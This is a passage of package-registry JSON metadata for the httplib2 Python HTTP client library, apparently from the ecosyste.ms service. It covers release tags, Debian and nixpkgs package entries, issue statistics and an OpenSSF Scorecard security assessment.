_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T14:22:35.691Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/debian/python-httplib2?arch=source\u0026distro=debian-11\u0026repository_url=https://packages.debian.org/bullseye","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/python-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/python-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/python-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/python-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/python-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/python-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/python-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/python-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/python-httplib2/codemeta","maintainers":[],"registry":{"name":"debian-11","url":"https://packages.debian.org/bullseye","ecosystem":"debian","default":false,"packages_count":31268,"maintainers_count":0,"namespaces_count":3,"keywords_count":759,"github":"debian","metadata":{"codename":"bullseye","funded_packages_count":805},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:49.702Z","updated_at":"2026-08-25T05:06:44.833Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/namespaces"}},{"id":13195490,"name":"python311Packages.httplib2","ecosystem":"nixpkgs","description":"A comprehensive HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-02T00:22:51.574Z","latest_release_published_at":"2026-02-02T00:22:51.574Z","latest_release_number":"0.22.0","last_synced_at":"2026-05-08T12:37:24.686Z","created_at":"2026-02-02T00:22:37.747Z","updated_at":"2026-08-21T15:39:37.149Z","registry_url":"https://search.nixos.org/packages?channel=24.05\u0026query=python311Packages.httplib2","install_command":"nix-env -iA nixpkgs.python311Packages.httplib2","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.05/pkgs/development/python-modules/httplib2/default.nix#L74","metadata":{"nix_attribute":"python3.11-httplib2-0.22.0","position":"pkgs/development/python-modules/httplib2/default.nix:74","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","x86_64-windows","i686-windows"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"httplib2","upstream_purl":"pkg:pypi/httplib2"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://githu